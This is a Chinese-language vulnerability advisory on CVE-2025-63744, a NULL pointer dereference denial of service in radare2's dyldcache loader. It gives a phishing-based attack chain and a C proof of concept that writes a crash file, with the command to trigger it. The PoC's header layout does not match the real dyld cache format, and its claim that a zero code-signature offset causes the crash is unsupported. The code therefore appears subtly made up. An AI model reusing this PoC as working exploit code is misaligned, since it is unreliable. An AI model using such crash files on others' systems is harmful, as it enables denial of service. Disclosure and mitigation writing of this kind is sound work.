CVE-2025-63744: radare2 bin_dyldcache.c空指针解引用拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-63744

漏洞类型

空指针解引用

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

radare2

漏洞概述

CVE-2025-63744是影响radare2 6.0.5及更早版本的一个中等严重程度安全漏洞。该漏洞存在于radare2的二进制分析框架中，具体位于bin_dyldcache.c文件的load()函数内。radare2是一款开源的逆向工程框架，广泛应用于二进制分析、漏洞研究、软件调试和安全审计领域。攻击者可以通过构造特制的dyldcache文件来触发该漏洞。当radare2尝试解析和加载恶意制作的dyldcache文件时，由于load()函数中存在空指针解引用问题，程序将遭遇 segmentation fault 并崩溃。此漏洞虽然不直接导致远程代码执行，但能够造成目标应用程序的拒绝服务状态，对于依赖radare2进行实时分析的安全研究人员和逆向工程师而言，可能造成工作中断和数据丢失。鉴于radare2在安全社区的高使用率，该漏洞对持续集成环境和自动化分析管道的影响尤为显著。

技术细节

该漏洞的根本原因在于radare2的bin_dyldcache.c文件中load()函数对dyldcache格式文件的解析逻辑存在缺陷。具体而言，当处理特制的dyldcache文件时，函数未能正确验证指针的有效性就直接进行解引用操作，导致空指针访问违例（NULL pointer dereference）。在C/C++编程中，空指针解引用是一种常见的安全缺陷，通常发生在以下情况：1) 指针未被初始化或被显式设置为NULL；2) 内存分配失败返回NULL但代码未检查；3) 释放内存后指针未置NULL产生悬空指针。在本漏洞中，攻击者构造的dyldcache文件可能包含畸形的数据结构或特定的偏移量，使得解析过程中的某个关键指针被设置为NULL。随后当代码尝试通过该NULL指针访问成员变量或调用函数时，将触发CPU的保护机制，导致进程崩溃。攻击者只需诱导用户使用radare2打开恶意文件即可触发漏洞，无需特殊权限或用户交互之外的额外条件。

攻击链分析

STEP 1

步骤1

攻击者创建包含畸形数据的特制dyldcache文件，设置特定偏移量使load()函数中的指针为NULL

STEP 2

步骤2

攻击者通过钓鱼邮件、恶意网站或社会工程学手段诱导目标用户下载并使用radare2打开该恶意文件

STEP 3

步骤3

radare2调用bin_dyldcache.c中的load()函数解析文件，在未进行空指针检查的情况下直接解引用NULL指针

STEP 4

步骤4

CPU触发段错误保护机制，radare2进程崩溃，导致拒绝服务状态

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-63744 PoC - radare2 NULL Pointer Dereference in bin_dyldcache.c
// Author: Security Researcher
// Target: radare2 <= 6.0.5

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

// DYLDCACHE_MAGIC for identification
#define DYLDCACHE_MAGIC "dyld_v1"

// Crafted dyldcache header structure
typedef struct {
    char magic[8];          // Magic number
    uint32_t header_size;   // Header size
    uint32_t dylib_count;   // Number of dylibs
    uint64_t timestamp;     // Timestamp
    uint64_t tree_size;     // Tree size
    uint64_t code_sig;      // Code signature offset (crafted to trigger NULL)
    uint64_t rebase_info;   // Rebase info offset
} dyldcache_header_t;

// Create a crafted dyldcache file to trigger NULL pointer dereference
int create_malicious_dyldcache(const char* filename) {
    FILE* fp = fopen(filename, "wb");
    if (!fp) {
        printf("[-] Failed to create file\n");
        return -1;
    }
    
    dyldcache_header_t header;
    memset(&header, 0, sizeof(header));
    
    // Set magic number
    memcpy(header.magic, DYLDCACHE_MAGIC, 8);
    header.header_size = sizeof(dyldcache_header_t);
    header.dylib_count = 1;
    header.timestamp = 0;
    header.tree_size = 0x1000;
    
    // Craft offsets to trigger NULL pointer dereference in load() function
    // Setting code_sig to 0 will cause NULL pointer access when dereferenced
    header.code_sig = 0;  // Critical: triggers NULL dereference
    header.rebase_info = 0x100;  // Valid-looking offset
    
    // Write crafted header
    fwrite(&header, sizeof(header), 1, fp);
    
    // Add padding to make file look more authentic
    char padding[0x200] = {0};
    fwrite(padding, sizeof(padding), 1, fp);
    
    fclose(fp);
    printf("[+] Created malicious dyldcache file: %s\n", filename);
    return 0;
}

int main(int argc, char* argv[]) {
    if (argc < 2) {
        printf("Usage: %s <output_file>\n", argv[0]);
        printf("This PoC generates a crafted dyldcache file to trigger CVE-2025-63744\n");
        return 1;
    }
    
    printf("[*] Generating PoC for CVE-2025-63744\n");
    printf("[*] Target: radare2 <= 6.0.5\n");
    printf("[*] Vulnerability: NULL pointer dereference in bin_dyldcache.c\n");
    
    int result = create_malicious_dyldcache(argv[1]);
    
    if (result == 0) {
        printf("[+] PoC file created successfully\n");
        printf("[*] To trigger vulnerability, open file with: r2 -c 'aaa' %s\n", argv[1]);
    }
    
    return result;
}

影响范围

radare2 <= 6.0.5

防御指南

临时缓解措施

在官方修复发布之前，建议采取以下临时缓解措施：1) 避免使用radare2打开来源不明的dyldcache文件；2) 在隔离的沙箱环境中分析可疑二进制文件；3) 使用文件类型检测工具（如file命令）在打开前验证文件格式；4) 监控系统调用和异常信号，及时发现崩溃行为；5) 考虑使用radare2的只读模式或禁用自动分析功能以降低风险。